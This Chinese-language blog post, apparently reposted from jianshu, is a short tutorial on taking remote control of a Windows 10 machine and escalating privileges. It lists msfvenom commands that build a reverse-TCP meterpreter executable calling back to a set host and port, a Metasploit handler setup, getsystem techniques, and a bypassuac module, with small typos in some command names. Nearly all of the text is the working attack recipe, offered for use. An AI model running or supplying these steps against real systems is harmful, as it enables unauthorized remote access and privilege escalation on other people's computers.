Windows10 bypassuac 提权

一、 远控

    a) X86

        msfvnom –p payload/windows/meterpreter/reverse_tcp           # 32位

        msfvnom –p payload/windows/x64/meterpreter/reverse_tcp    # 64位

        i. LHOST=192.168.135.129 #指定反弹shell地址

        ii. LPORT=4444 #指定反弹shell端口

        iii. –f exe #生成文件类型

        iv. –o /root/DeskTop/name.exe #生成路径及文件名

二、 建立会话

    a) use exploit/multi/handler

        set payload windows/x64/meterpreter/reverse_tcp

        set payload windows/meterpreter/reverse_tcp

        i. set LHOST 192.168.135.129 #监听地址

        ii. set LPORT 4444 #监听端口

        iii. exploit / run #执行

        iv. background #挂起会话

三、 提权

    a) 命令(进入会话)

        getuid #获取用户id

        getsystem #获取sys权限

            1. –t 0 # 所有可用的技术(1,2,3)

            2. –t 1 # 命名管道模拟(在内存/管理中)

            3. –t 2 # 被命名为管道模拟(下拉/admin)

            4. –t 3 # 标记重复(在内存/管理中)

        search bypassuac

    b) 使用bypassuac(绕过用户帐户控制)


Windows10 bypassuac 提权_第1张图片

        set payload windows/x64/meterprese/reverse_tcp

        set target 1 #设置目标为x64,0:x86

本文连接:http://www.jianshu.com/p/11284bb8e231

版权声明:本文为简友原创文章,转载必须写明出处。

你可能感兴趣的:(Windows10 bypassuac 提权)